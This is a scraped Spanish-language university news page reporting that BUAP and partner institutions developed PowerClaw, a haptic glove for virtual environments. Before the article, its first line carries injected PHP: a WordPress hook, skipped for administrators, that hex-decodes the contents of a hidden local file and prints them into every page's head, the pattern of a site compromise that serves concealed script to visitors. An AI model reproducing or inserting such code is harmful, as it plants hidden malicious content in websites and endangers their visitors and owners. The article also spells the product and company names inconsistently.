if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Desarrollan un guante para ambientes virtuales en la Buap – La Opinión Universitaria La Opinión Universitaria
Menu

Desarrollan un guante para ambientes virtuales en la Buap

 

 

+ PowerClaw tiene diversas aplicaciones para la capacitación industrial, telemedicina y entretenimiento

Por Diego Cuautle

En un trabajo multidisciplinario para promover el desarrollo tecnológico enfocado en la realidad virtual, la Benemérita Universidad Autónoma de Puebla (BUAP) en colaboración con otras instituciones de educación superior crearon un guante con interfaces hápticas que permiten al usuario interactuar en ambientes virtuales al experimentar sensaciones de calor, frío, rugosidad y vibraciones.

Además de la BUAP, también se involucró el Instituto Tecnológico Superior de Huichapan (Iteshu) en colaboración con Universidad Autónoma de Querétaro (UAQ) y crearon el dispositivo que mejora la experiencia del usuario en ambientes virtuales y tiene aplicaciones directas en la industria, medicina a distancia, así como el entretenimiento enfocado en videojuegos.

El proyecto de la llamada “Power Clown” fue creado por la empresa Vovoxie y coordinado por la Fundación México-Estados Unidos para la Ciencia (Fumec) que gracias a las instituciones educativas participantes en este desarrollo tecnológico se pudo concretar.

Esto permitió que en solo dos años se pudiera pasar de la idea del producto a algo ya palpable para darlo a conocer; además, este fue apoyado por el Consejo Nacional de Ciencia y Tecnología (Conacyt) a través del Programa de Estímulos a la Innovación (PEI) que permite que empresas y universidades trabajen en conjunto con un fin en común.

Cabe señalar que la innovación tecnológica que aporta PowerClaw tiene diversas aplicaciones en ámbitos virtuales, como la capacitación industrial, telemedicina y entretenimiento, es decir, sta tecnología permite un entrenamiento efectivo de personal, puesto que pueden palpar de una mejor manera las piezas con las que trabajan.

La participación de las universidad en el desarrollo del guante háptico PowerClaw data del 2010, y consistió en el desarrollo de simulación virtual y circuitos electrónicos para la comunicación entre el guante y la computadora de control.

La vinculación de dichas instituciones universitarias la empresa Vivoxie ha permitido también la proyección de este y otros prototipos de realidad virtual en espacios internacionales como en el 2016 en la Gamescom que se llevó a cabo en Colonia, Alemania donde se pudo ver el efecto que tenía el guante PowerClaw.

 

No comments

Deja una respuesta

Tweets recientes